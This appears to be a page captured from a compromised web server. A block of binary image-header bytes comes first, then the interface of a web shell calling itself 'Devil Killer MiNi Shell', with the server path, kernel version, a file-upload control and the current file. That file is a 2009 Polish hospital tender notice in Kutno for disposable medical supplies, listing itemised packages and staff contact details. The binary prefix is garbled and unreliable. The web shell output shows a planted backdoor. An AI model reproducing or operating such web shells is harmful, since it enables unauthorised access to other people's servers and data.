JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090402/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090402/57713-N-2009.html

<p class="kh_header"><b>Kutno: Jednorazowe artykuły medyczne.
Nr ZP/5/09</b><br>
<b>Numer ogłoszenia: 57713 - 2009; data zamieszczenia: 02.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej , ul. Kościuszki 52, 99-300 Kutno, woj. łódzkie, tel. 024 3558171, faks 024 355 81 41.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital.kutno.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Jednorazowe artykuły medyczne.
Nr ZP/5/09.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> folia chirurgiczna- operacyjna, owinięcie na zwłoki, testy chemiczne i biologiczne do sterylizacji, opakowania sterylizacyjne ( krepowany papier zielony i rękawy jednostronne), zestawy do płukania żołądka, elektrody bierne do elektrokoagulacji, worki stomijne dla oddziału chirurgii ogólnej, cewniki do odsysania górnych dróg oddechowych,  dreny i pojemniki typu Redona, cewniki Tiemana i Pezzera, łączniki do drenów, zestawy do hemofiltracji, zestawy do aparatu Prisma M 100 PRE I SET, sondy Miller-Abbotta, zestawy do punkcji jamy brzusznej, zestawy do upustu krwi, igły do punkcji jamy brzusznej, ochraniacze na buty, podgłówki, pozycjonery, czyściki i okulary do fototerapii, elektrody do defibrylacji, wzierniki jednorazowe, szczoteczki cytologiczne, obłożenia i serwety operacyjne sterylne, zestawy pościeli jednorazowej, szpatułki- patyczki do mycia jamy ustnej, bezigłowy system do linii infuzyjnej typu Ultrasite, torby na wymiociny, strzykawki..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 33.14.16.10-9, 33.14.16.41-5, 33.14.16.42-2, 19.52.00.00-7, 33.14.12.00-2, 33.14.16.20-2, 33.15.71.10-9, 33.14.10.00-0, 33.14.13.20-9, 33.69.65.00-0, 33.12.41.30-5, 19.73.20.00-6, 41.00.00.00-9, 33.19.41.20-3, 33.14.13.10-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 27.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 22.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Nie jest wymagane wniesienie wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> I.	Zgodnie z przepisami art. 22 ustawy Prawo zamówień publicznych, o udzielenie zamówienia  mogą ubiegać się Wykonawcy, którzy:
A.  Posiadają uprawnienia do wykonania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
Zamawiający uzna, że Wykonawca spełnił powyższy warunek jeśli posiada: 
1)	Aktualny odpis z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.
2)	Posiada aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert. 
B.  Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia, 
Zamawiający uzna, że Wykonawca spełnił powyższy warunek jeśli:
-	przedstawi wykaz wykonanych co najmniej 3, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i łączną wartością dostawom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączy dokumenty potwierdzające, że te dostawy zostały wykonane należycie - Wykonawca przedstawi co najmniej 3 dokumenty potwierdzające, że zrealizowane dostawy zostały wykonane należycie, odpowiadają swoim rodzajem dostawom określonym w SIWZ  a ich łączna wartość brutto odpowiada -wartości brutto zadań, na które złożył ofertę.
C.  Znajdują się w sytuacji ekonomicznej  i finansowej zapewniającej wykonanie zamówienia, 
Zamawiający uzna, że Wykonawca spełnił powyższy warunek jeśli - 
jest on ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności i suma gwarancyjna wynosi co najmniej 100 000 zł. 
D.  Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.
Zamawiający uzna, że Wykonawca spełnił powyższy warunek jeśli złoży:
oświadczenie, że spełnia warunki określone w art.22 ust.1 oraz art. 24 ustawy z dnia 29.01.2004r. Prawo zamówień publicznych.


II.	Potwierdzenie, że oferowane dostawy odpowiadają wymaganiom określonym przez zamawiającego.
Zamawiający uzna, że Wykonawca spełnił powyższy warunek jeśli złoży:
1)	próbki oferowanego przedmiotu zamówienia - dotyczy Pakietów nr od 1 do 14.
2)	katalogi zawierające oferowany przedmiot zamówienia,
3)	oświadczenie Wykonawcy, że oferowany przedmiot zamówienia posiada wszystkie wymagane, aktualne dokumenty (deklaracja zgodności z wymogami zasadniczymi wystawiona przez producenta, wpis/zgłoszenie do Rejestru Wyrobów Medycznych i podmiotów odpowiedzialnych za ich wprowadzenie do obrotu i używania, certyfikat jednostki notyfikowanej) dopuszczające do obrotu i stosowania zgodnie z przepisami Ustawy z dnia 20 kwietnia 2004r.o wyrobach medycznych lub w przypadku  wyrobów nie medycznych inne wymagane dokumenty, zgodnie z obowiązującymi przepisami oraz, że udostępni stosowne dokumenty na każde wezwanie Zamawiającego.
Spełnienie warunków udziału w postępowaniu będzie oceniane na podstawie przedstawionych dokumentów i próbek  wg formuły spełnia - nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Na potwierdzenie spełnienia warunków udziału w postępowaniu należy załączyć do oferty:
1.	Aktualny odpis z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.
2.	Aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.
3.	Wykaz wykonanych co najmniej 3, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i łączną wartością dostawom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączy dokumenty potwierdzające, że te dostawy zostały wykonane należycie - Wykonawca przedstawi co najmniej 3 dokumenty potwierdzające, że zrealizowane dostawy zostały wykonane należycie, odpowiadają swoim rodzajem dostawom określonym w SIWZ  a ich łączna wartość brutto odpowiada -wartości brutto zadań, na które złożył ofertę.
4.	Polisa, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności i suma gwarancyjna wynosi co najmniej 100 000 zł.
5.	Oświadczenie, że spełnia warunki określone w art.22 ust.1 oraz art. 24 ustawy z dnia 29.01.2004r. Prawo zamówień publicznych.
6.	Próbki oferowanego przedmiotu zamówienia - dotyczy Pakietów Nr od 1 do 14.
7.	Katalogi zawierające oferowany przedmiot zamówienia.
8.	Oświadczenie Wykonawcy, że oferowany przedmiot zamówienia posiada wszystkie wymagane, aktualne dokumenty (deklaracja zgodności z wymogami zasadniczymi wystawiona przez producenta, wpis-zgłoszenie do Rejestru Wyrobów Medycznych i podmiotów odpowiedzialnych za ich wprowadzenie do obrotu i używania, certyfikat jednostki notyfikowanej) dopuszczające do obrotu i stosowania zgodnie z przepisami Ustawy z dnia 20 kwietnia 2004r.o wyrobach medycznych lub w przypadku  wyrobów nie medycznych inne wymagane dokumenty, zgodnie z obowiązującymi przepisami oraz, że udostępni stosowne dokumenty na każde wezwanie Zamawiającego.
9.	Pełnomocnictwo do podpisania oferty ( nie jest wymagane, jeśli podpisujący ofertę jest lub są właścicielami firmy lub jeśli są wymienieni z imienia i nazwiska w dokumencie rejestracyjnym)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 50</li>
<li>2 - Jakość (Cena-50%,Jakość-50% dla Pakietów Nr od 1 do 14) - 50</li>
<li>3 - Cena - 100% - dla Pakietów Nr od 15 do 27) - 00</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.szpital.kutno.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 99-300 Kutno ul. Kościuszki 52 pokój 07d w godzinach od 8:00 do 14:00 bądź pocztą po uprzednim, pisemnym wniosku złożonym na adres Zamawiającego lub złożonym faksem na nr (024) 355-81-41..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.04.2009 godzina 10:00, miejsce: Sekretariat Dyrektora SP ZOZ w Kutnie ul. Kościuszki 52, 99-300 Kutno.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Pracownikami uprawnionymi do kontaktowania się  z Wykonawcami oraz do udzielania wyjaśnień w godz. 800 - 1400 są: Naczelny Pielęgniarz  mgr Robert Bąk - tel. 024-355-81-00 wew. 543; - w sprawach merytorycznych i st. inspektor ds. zamówień publicznych i umów Monika Lewandowska tel.fax 0-24- 355-81-71 -w sprawach formalno prawnych, Adres poczty elektronicznej: m.lewandowska@szpital.kutno.pl.</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Folia chirurgiczna - operacyjna o rozmiarach około:15x2830x2845x28-szt. 900.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.16.10-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 22.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Jakość - 50</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Owinięcie na zwłoki dla dorosłych ok. długość 230cm x szerokość 180 cm  (kolor  czarny).	   szt.	1300
2.	Owinięcie na zwłoki dla dzieci ok. długość 100cm x szerokość 80 cm  (kolor  czarny).		60.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.16.41-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 22.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Jakość - 50</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Testy chemiczne do sterylizacji parowej (typu Comply, TST)	op.	56 opakowań(240szt. w opakowaniu)
2. 	Testy chemiczne do sterylizacji gazowej (typu Comply, TST)	op.	40 opakowań(240szt. w opakowaniu)
3.	Testy biologiczne do sterylizacji parowej (typu ATTEST)	op.	4opakowania(100szt. w opakowaniu)
4.	Testy biologiczne do sterylizacji gazowej (typu ATTEST)	op.	24 opakowań(100szt. w opakowaniu)
5. 	Testy Bowie - Dicka, np. arkuszowe (dopuszcza się zaoferowanie innego rodzaju niż arkuszowe, należy wówczas przeliczyć odpowiednio zapotrzebowanie)	op.	20 opakowań  (50 szt. w opakowaniu)
6.	Taśmy wskaźnikowe do sterylizacji parowej	   rolka	szer.25 mm - 100 rolekpo 55m w rolce
7.	Taśmy  wskaźnikowe do sterylizacji gazowej	rolka	szer.19 mm - 30 rolekpo 55m w rolce.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.16.42-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 22.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Jakość - 50</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pakiet.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Krepowany papier zielony	 	
	40x40	 opak. 500	20
	50x50	 opak. 500	15
	60x60	 opak. 500	20
	75x75	 opak. 250	100
	90x90	 opak. 250	120
	100x100	 opak. 250	80
2.	Rękawy jednostronnie  przezroczyste (papierowo-foliowe)	  rolki	
Bez fałdy		
	50mm x 200m		20
	75mm x 200m		25
	100mm x 200m		120
	150mm x 200m		160
	200mm x 200m		150
	250mm x 200m		  60  
	300mm x 200m		  15  
	400mm x 200m		   8      
Z fałdą		
	100mm x 50mm x 100m		120
	150mm x 50mm x 100m		140
	200mm x 50mm x 100m		150
	250mm x65mm x 100m		 30
	300mm x 65mm x 100m		
	400-420mm x 65-90mm x 100m	8.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.16.42-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 22.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Jakość - 50</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pakiet.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Zestaw do płukania żołądka, umożliwiający pomiar ilości płynu wlewanego i wylewanego - dwa przeźroczyste worki oraz 2 janetty do wlewania i wyciągania - rozm. 40F dla dorosłych - opakowanie folia/papier	szt.	200
2.	Zestaw do płukania żołądka, umożliwiający pomiar ilości płynu wlewanego i wylewanego - dwa przeźroczyste worki oraz 2 janetty do wlewania i wyciągania - rozm. 34F dla dzieci - opakowanie folia-papier	szt.	60.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 19.52.00.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 22.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Jakośc - 50</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Pakiet.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. 	Elektroda neutralna jednorazowa, jednoczęściowa dla dorosłych do elektrokoagulacji	szt.	2500
2.	Elektroda neutralna jednorazowa, jednoczęściowa dla dzieci do elektrokoagulacji	      szt.	 200.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.12.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 22.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Jakość - 50</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Pakiet.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Worek stomijny jednorazowy bez odpływu Q60 (z filtrem, z flizeliny - przyjazny dla skóry).	szt. 	300
2.	Worek stomijny jednorazowy z odpływem na rzep Q60 (z filtrem, z flizeliny - przyjazny dla skóry).	szt.	300
3.	Worek stomijny dwuczęściowy bez odpływu Q60(worek + płytka wklęsła typu Convex, w stosunku 5 : 1).Należy wycenić 300 szt. worków i 60 szt. płytek	szt.	300
4.	Worek stomijny dwuczęściowy z odpływem na rzep Q60 (worek + płytka wklęsła typu Convex, w stosunku 5 : 1) Należy wycenić 200 szt. worków i 40 szt. płytek.	szt.	200.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.16.20-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 22.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Jakość - 50</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Pakiet.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Cewniki do odsysania górnych dróg oddechowych z otworem centralnym i min. Dwoma otworami bocznymi - dł. Min. 40cm o rozmiarach; 6, 8, 10, 12, 14, 16, 18, 20.	 szt.	 20 000.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.15.71.10-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 22.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Jakość - 50</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Pakiet.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Sterylny zestaw do laparoskopii ginekologicznej wykonany z chłonnego wytrzymałego, nieprzemakalnego laminatu. Skład zestawu: A) serweta podstawowa 180x240cm, gramaturze dwuwarstwowego laminatu nieprzemakalnego o gramaturze min. 60g/m2,minimalnej odporności na penetrację płynów(nieprzemakalności):=>100cm oraz wytrzymałości na rozerwanie min 100 Kpa, zintegrowana z nogawicami oraz ekranem anestezjologicznym. W części centralnej serwety znajduje się otwór 20x30x20 cm otoczony taśmą lepną, w części kroczowej otwór 10x15 cm wraz z przykrywającą go klapką 20x20cz. B) pokrowiec na stolik Mayo 80x140cm wykonany z folii PE o minimalnej grubości min 0,06mm i warstwy chłonnej wykonanej z laminatu nieprzemakalnego z warstwą chłonną o gramaturze min. 60gm2.C) taśma samoprzylepna 10x50cm,D) kieszeń komorowa na ssak i koagulacje 2x15x40 cm wykonana z folii PE o min .grubości 0,12mm. E) serweta o wym. 150x200cm (owinięcie zestawu) która może służyć jako przykrycie stolika wykonane w całości z laminatu nieprzemakalnego z warstwą chłonną o gramaturze min. 60gm2, minimalnej odporności na penetrację płynów ( nieprzemakalność) =>100cm oraz wytrzymałości na rozerwanie min. 100 Kpa- 1 szt. 	 szt.	200
2.	Zestaw do cięcia cesarskiego wykonany z chłonnego wytrzymałego, nieprzemakalnego laminatu. Skład zestawu: A) serweta 180x300cm, dwuwarstwowego laminatu nieprzemakalnego o gramaturze min. 60gm2, minimalnej odporności na penetrację płynów (nieprzemakalność) =>100cm oraz wytrzymałości na rozerwanie min. 100 Kpa z centralnym otworem 20x30x20cm wypełniony folią chirurgiczną poliuretanową o grubości od 0,025mm do 0,030mm i przepuszczalność dla pary wodnej powyżej 1000gm224h, B) pokrowiec na stolik Mayo 80x140cm wykonany z folii PE o minimalnej grubości min o,06mm i warstwy chłonnej wykonanej z laminatu nieprzemakalnego z warstwą chłonną o gramaturze min. 60gm2 - 1 szt. C) ściereczka chłonna -2 szt.D) owinięcie noworodka z włókniny bawełnopodobnej o wymiarze 80x90cmE) serweta owinięcie 150x200cm- przykrycie na stolik instrumentalny wykonane w całości z laminatu nieprzemakalnego z warstwą chłonną o gramaturze min. 60gm2 , minimalnej odporności na penetrację płynów (nieprzemakalność): => 100cm oraz wytrzymałości na rozerwanie min. 100 Kpa - 1 szt.	 szt.	600
